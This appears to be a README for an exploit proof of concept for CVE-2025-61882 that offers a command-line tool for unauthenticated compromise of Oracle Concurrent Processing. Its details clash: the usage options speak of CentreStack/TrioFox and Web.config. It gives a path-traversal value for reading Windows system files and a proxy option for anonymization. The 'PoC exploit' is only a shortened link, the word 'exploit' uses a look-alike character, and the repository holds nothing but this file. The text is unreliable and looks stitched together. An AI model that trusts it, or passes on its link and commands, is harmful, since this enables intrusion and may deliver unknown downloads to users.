# CVE-2025-61882
### Overview
The vulnerability allows an unauthenticated attacker with network access via HTTP to completely compromise the Oracle Concurrent Processing system.
### Requirements
- Python 3.8+
- Libraries: requests, argparse (install via `pip install -r requirements.txt`)
### Usage
- Install dependencies: `pip install -r requirements.txt`
- Run the explоit: `python explоit.py --target <target_url> --file "/path/to/Web.config"`
Options:
- `--target`: URL of the vulnerable CentreStack/TrioFox instance.
- `--file`: Relative path to the file to include (e.g., "../../../../Windows/system.ini" for testing).
- `--proxy`: Optional HTTP proxy for anonymization.
### How It Works
An attacker can: - Fully take over the Oracle Concurrent Processing system - Potentially gain unauthorized access to confidential data - Modify or delete critical business information - Disrupt business operations - Execute arbitrary code without requiring authentication The attack can be performed remotely over the network without any user interaction, making it extremely dangerous.
### Ethical Use Warning
- This script is a proof-of-concept for CVE-2025-61882 for educational and authorized security testing purposes.
- **Do not use this script on systems without explicit permission from the system owner.**
- Misuse may violate laws, including the Computer Fraud and Abuse Act (CFAA) in the United States or similar laws elsewhere.
- Always obtain written consent before testing any system.
### PoC explоit - [href](https://tinyurl.com/bdhdhmx2)
For any inquiries, please email me at: rootaid@outlook.com
[4.0K] /data/pocs/3c0a6b0e9f9afa691bda9872fc5cdb3358c2a0e4
└── [1.6K] README.md
1 directory, 1 file